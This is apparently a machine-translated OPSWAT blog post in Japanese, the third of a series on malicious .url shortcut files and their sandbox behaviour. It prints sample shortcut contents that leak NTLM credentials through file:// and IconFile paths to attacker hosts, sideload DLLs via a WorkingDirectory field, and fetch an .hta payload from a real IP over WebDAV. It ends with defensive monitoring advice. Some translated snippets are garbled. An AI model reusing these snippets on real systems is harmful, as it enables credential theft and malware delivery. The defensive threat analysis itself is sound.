悪意への近道 その3MetaDefender Sandbox使ったURLファイルの行動分析

静的検査がファイルの中身を明らかにするのに対して、動的分析はそのファイルが何をするのかを教えてくれる。インターネット・ショートカット・ファイル（.url）に関しては、この違いは極めて重要です。ディスク上では一見無害に見えるこれらのファイルは、リモートペイロードの実行、認証情報の窃取、永続性の有効化など、多段階のマルウェアキャンペーンのトリガーポイントとして機能することがよくあります。

URLファイルの脅威に関するシリーズの3回目、最終回となる今回は、動的な挙動に焦点を当てます。.urlファイルが現実世界でどのように動作し、実行後のどのような活動を明らかにするかということです。この行動の観点は MetaDefender SandboxOPSWATマルウェア爆発環境であるMetaDefender Sandboxを通して調べるのが最適です。

前の2つのブログは、以下のオプションから選んでご覧いただけます：

• 第1部：悪意への近道：URLファイルが再びサイバー脅威の脚光を浴びる理由
• パート2：悪意への近道：悪意のあるURLファイルの静的解析とその背後にある手口

静的解析は疑わしい書式にフラグを立てますが、MetaDefender Sandbox 以下のような本当の侵害を示す実行時の動作をキャプチャします：

• 攻撃者インフラへのDNSクエリまたはアウトバウンドHTTP接続
• Windowsコンポーネント（mshta.exe、wscript.exeなど）を起動し、ペイロードを起動する。
• 自動開始場所またはWindowsレジストリへのファイル書き込み
• NTLM 認証情報を漏らす SMB 認証の試み
• SMB失敗後のHTTP/80経由でのWebDAVフォールバック通信

URLファイルの悪用に関する全体像への新たな貢献が2018年に発生し、今回は情報漏洩と、リモート攻撃者による認証およびクレデンシャル資料のキャプチャにおいてURLファイルが役割を果たす可能性に関するものであった。 

5月のことだ、 セキュリファイ は、Windows のサブシステムがユーザの NTLM 認証情報を攻撃者が管理するホストに送信するように騙すことができるいくつかの方法を指摘している。URL ファイルを使用する 2 つの方法が公開されている。 file:// 接頭辞でリモート・ファイルを参照する： 

[InternetShortcut] 

URL=file://<responder ip>/leak/leak.html

...このサンプルと同様に、IconFileオプションを使ってURLハンドラを起動し、レンダリングする画像を抽出するためにリモートのアイコンファイルを取得します：

[InternetShortcut] 

URL=https://securify.nl 

IconIndex=0 

IconFile=\\<responder ip>\leak\leak.ico

2つ目のケースでは、プロトコルの接頭辞のオプション性、フォワード・スラッシュまたはバックスラッシュの交換可能な使用、攻撃者のインフラへの危険なアクセスによる特権昇格の意図しないチャネルとしてのSMBの全体的な持続性など、懸念される多くの要素が、オペレーティング・システムで一般的に見られる攻撃対象に収束していることが明らかになった。

これと同じ手法である IconFile オプションを用いたクレデンシャルアクセスについては、後日Alex Inführ氏も言及している。前述の通り、これらの URL ファイルが有効化されると、リモートサーバへの SMB 接続が開始され、認証のやり取りが行われ、攻撃者に NTLM クレデンシャルデータが開示される。この種の攻撃のリモート側で、多くの脅威者が使用している一般的な敵対ツールキットがResponder である。

URLファイルの悪用可能性のもう一つの側面は、DLLのサイドローディングを通じて信頼できないコードを実行するために、ファイル内のフィールドを悪用することについて、Inführ氏によって開示された。この概念実証では、URL ファイルは DLL の検索パスハイジャックに脆弱なローカルの実行可能ファイルを指すために使用される。URL ファイルをアクティブにすると、WorkingDirectory オプションが処理され、ロードされた DLL の検索パスがリモートの SMB 共有上の攻撃者が制御するディレクトリを含むように設定される。

[インターネットショートカット］
URL=C:୧Windows...୧Mscorsvw.exe
WorkingDirectory=Attacker[.]com

RemcosやFormbook RATの配布に使用されたDBatLoaderに関するZscaler ThreatLabzの分析など、マルウェアのキャンペーンで文書化されているように、URLファイルはシステム上での実行にも使用できるショートカットファイルです。  

自動起動の場所にリンクされている場合、これらのファイルは、再起動またはログイン後にマルウェアを実行できるようにするための永続化手段もサポートします。この配布キャンペーンの場合、以下のURLファイルが使用され、Xdfiifag.exe内のマルウェアのペイロードを起動できるようになっていました。

[インターネットショートカット］
URL=file: "C:¥Users¥Public¥Libraries¥Xdfiifag.exe""¥Users¥Public¥Libraries¥Xdfiifag.exe"
IconIndex=13
HotKey=49

2023年6月、@AnFam17は、ソーシャルエンジニアリングベースのランディング・トラフィック・リダイレクトが、特にURLファイルを通じて、ユーザーをNetSupport RATの負荷に配信しているという情報を共有しました。上流のソーシャルエンジニアリングベースのランディングページは、FakeSGとして知られるキットに関連していました。サンプルURLファイル（Install Updater (msi-stable(V102.84.3348).url）： 

[インターネットショートカット］
URL=file:\\94.158.247.6@80\Downloads\updatermsi.hta
ShowCommand=7
IconIndex=247
IconFile=C:¥Windows¥System32¥shell32.dll

この URL ファイルは、以前の反復練習と同様に、以下のことを示している。 file:// プロトコルの接頭辞は、ここではスラッシュではなくバックスラッシュを使用することで、高い柔軟性を持って表現することができる。

ここで注目すべきは、先に述べたファイル接頭辞を使用したURLファイルと同様に、本質的な矛盾が発生していることである。これらのURLの場合、攻撃者はWebDAVサーバー上でペイロードをホストしているため、コンテンツはSMBではなく、ポート80/tcpのWebDAVプロトコルを使用してHTTPで取得されます。

このトピックの関連でもう1つ注目すべき事例は、2023年7月に公表された別の注目度の高い脆弱性、CVE-2023-36884の公開の前後に発生した。この脆弱性は当時、標的型攻撃キャンペーンに利用されていることが報告されていた0日脆弱性で、脅威グループがRomComRATの修正された亜種を配布するために利用していました。  

複雑で多段階に渡る脅威の連鎖は、URLファイルの取り扱いに焦点を当て、WebDAVを介してアクセスされたZIPアーカイブパスからペイロードがロードされた場合に、チェックされていないリモートコードが実行されることを明らかにした。 

インターネット・ショートカット（URLファイル）の悪用に関するこの回顧的な考察から、私たちは、何年もの間、URLファイルが脅威の状況において、脇役ではあるものの役割を果たし、主役になることはめったになかったことを知ることができる。多くの場合、実現可能な技術やセキュリティ機能のバイパスは、深刻度の低い脆弱性としてランク付けされ、時には非セキュリティバグとして軽視されることさえあり、ベンダーがCVEを受け入れるレベルには達していません。

多くの場合、脅威アナリストとして、私たちは脅威のシーケンスにおいて最も明白な犯人を優先し、最終的なペイロードと攻撃者が目的に対してどのように行動するかに最も重点を置いています。しかし、今日の敵対者は、攻撃サーフェスの縮小によるコスト増は、ますます複雑化するファイルベースの手口で対応できることを認識するようになっており、URLファイルを使用する攻撃シーケンスは、そのような攻撃チェーンで使用されていることを示す良い指標となることが多いことに注意することが重要です。

OPSWAT 、組織がこの複雑で多層的なファイルベースのトレードクラフトの領域に集中し続けることを推奨する。

• リモートURLファイルへのアクセス試行を監視する。組織は、リモートでホストされているURLファイルへのアクセスをブロックすることが実行可能であることに気付くかもしれない。
• 環境で遭遇するURLファイルのターゲットを分析・検査し、file://ベースのプロトコルの機能を悪用しているもの、外部のSMBやWebDAV経路を参照しているもの、URL、IconFile、WorkingDirectoryフィールドのその他の異常を探す。
• 外部の信頼できないインフラとのアウトバウンド SMB および WebDAV セッションを監視し、検証する。WebDAVをサポートする多くのサービスやクラウドストレージソリューションが利用可能であり、4shared、DriveHQ、OpenDriveなどの脅威キャンペーンで悪用されていることに注意してください。これらのサービスは、潜在的な被害者を標的とする際に悪用される可能性のある、一般に利用可能で帰属性のないサービスを攻撃者に提供します。
• 外部SMBサービスへの接続をブロックする。長年にわたる関連する脅威の活動から、これは情報漏えい、リモートコード実行、および関連するリスクの継続的な痛みの原因であることが示されている。将来の攻撃は、特にレガシーOSバージョンに対して、この種の手口を武器にし続ける可能性が高く、このような場合の制御は、未知の脅威を検出し、破壊するのに役立つ。
• 最先端のDeep File Inspection®および RetroHunt® テクノロジーを活用し、他のどのソリューションよりも深くスキャンして、ファイルを媒介とする攻撃を暴露します。

この記事では、URLファイルが単純なショートカットの域をはるかに超えてどのように機能するかを示した。

MetaDefender Sandbox 重要なインサイトを提供します。ディープファイルインスペクションのパワーとMetaDefender InSightsによって提供されるコンテキストと共に、組織はキルチェーンのあらゆるフェーズでファイルを媒介とする脅威の一歩先を行くことができます。